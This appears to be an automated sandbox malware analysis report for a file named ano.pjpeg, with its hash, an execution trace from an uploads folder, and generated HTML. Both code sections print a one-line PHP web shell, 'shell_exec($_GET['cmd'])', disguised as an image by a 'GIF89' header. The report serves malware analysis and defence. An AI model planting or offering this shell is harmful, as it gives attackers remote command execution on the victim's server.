PHP Malware Analysis

ano.pjpeg

md5: d2874842d1ac697fec9761f168de83fe

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

GIF89

<?php 
echo shell_exec($_GET['cmd']);

Execution traces

data/traces/d2874842d1ac697fec9761f168de83fe_trace-1676262490.4403.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:28:36.338127]
1	0	1	0.000260	393512
1	3	0	0.000314	394024	{main}	1		/var/www/html/uploads/ano.pjpeg	0	0
2	4	0	0.000358	394024	shell_exec	0		/var/www/html/uploads/ano.pjpeg	3	1	NULL
2	4	1	0.000389	394056
2	4	R			FALSE
1	3	1	0.000404	394024
			0.000439	314224
TRACE END   [2023-02-13 02:28:36.338354]


Generated HTML code

<html><head></head><body>GIF89

</body></html>

Original PHP code

GIF89

<?php echo shell_exec($_GET['cmd']); ?>